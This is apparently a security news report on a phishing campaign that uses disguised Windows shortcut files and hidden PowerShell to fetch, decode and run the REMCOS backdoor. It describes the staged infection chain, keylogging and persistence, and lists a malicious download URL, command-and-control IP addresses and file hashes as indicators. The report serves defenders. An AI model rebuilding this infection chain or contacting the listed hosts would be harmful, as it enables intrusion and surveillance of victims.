Cybersecurity researchers have identified a sophisticated malware campaign utilizing malicious Windows shortcut (LNK) files to deliver the REMCOS backdoor, demonstrating how threat actors continue to evolve their tactics to bypass security measures.
The attack, identified through analysis of the file “ORDINE-DI-ACQUIST-7263535” (SHA256: 506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6), showcases a multi-stage infection process that exploits trusted system utilities to maintain stealth throughout the compromise.
Fileless Attack Chain Exploits PowerShell for Stealthy Deployment
The attack begins with a deceptively simple LNK file disguised as a legitimate document or invoice, distributed primarily through phishing emails or malicious downloads.
When executed, the shortcut triggers a hidden PowerShell command that initiates a three-stage infection process without triggering traditional macro security warnings.
The first stage involves downloading a Base64-encoded payload from “shipping-hr.ro/m/r/r.txt” and saving it as “HEW.GIF” in the Windows ProgramData directory.
The PowerShell command then decodes this Base64 content into a binary executable named “CHROME.PIF,” effectively transforming what appears to be an image file into a functional malware payload.
This technique allows the malware to operate entirely in memory during initial stages, making detection significantly more challenging for traditional antivirus solutions.
The final stage executes the CHROME.PIF file, which serves as a Program Information File (PIF) – a format that can run DOS programs and often evades scrutiny due to Windows’ default extension hiding behavior.
This multi-stage approach effectively bypasses many security controls by leveraging legitimate Windows functionality throughout the infection chain.
REMCOS Backdoor Establishes Comprehensive System Control
Once deployed, the REMCOS backdoor, written in C++, establishes communication with command-and-control servers including IP addresses 92.82.184.33 (Romania) and 198.23.251.10 (United States) using encrypted TLSv1.2 protocols.
The malware demonstrates extensive capabilities, including keystroke logging, screenshot capture, webcam and microphone access, and arbitrary command execution.
Technical analysis reveals that the backdoor utilizes the SetWindowsHookExA API from user32.dll to inject keyboard monitoring hooks, creating comprehensive surveillance capabilities.
All captured data is stored in a “logs.dat” file within a “remcos” folder in the ProgramData directory, providing persistent access to victim activities.
The malware also establishes persistence through registry modifications and creates additional files, including “Xufewgoz.url” and batch files to maintain system access across reboots.
Security experts recommend implementing multi-layered defense strategies, including updated antivirus solutions, user education about suspicious attachments, and regular system monitoring to detect unusual PowerShell activity.
Organizations should particularly focus on monitoring ProgramData directory modifications and network connections to suspicious domains as key indicators of compromise.
Indicators of compromise
SHA256 & File name:
| File | SHA-256 |
| ORDINE-DI-ACQUIST-7263535 | 506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6 |
| CHROME.PIF | 5ec8268a5995a1fac3530acafe4a10eab73c08b03cabb5d76154a7d693085cc2 |
| HEW.GIF | 8bc668fd08aecd53747de6ea83ccc439bdf21b6d9edf2acafd7df1a45837a4e1 |
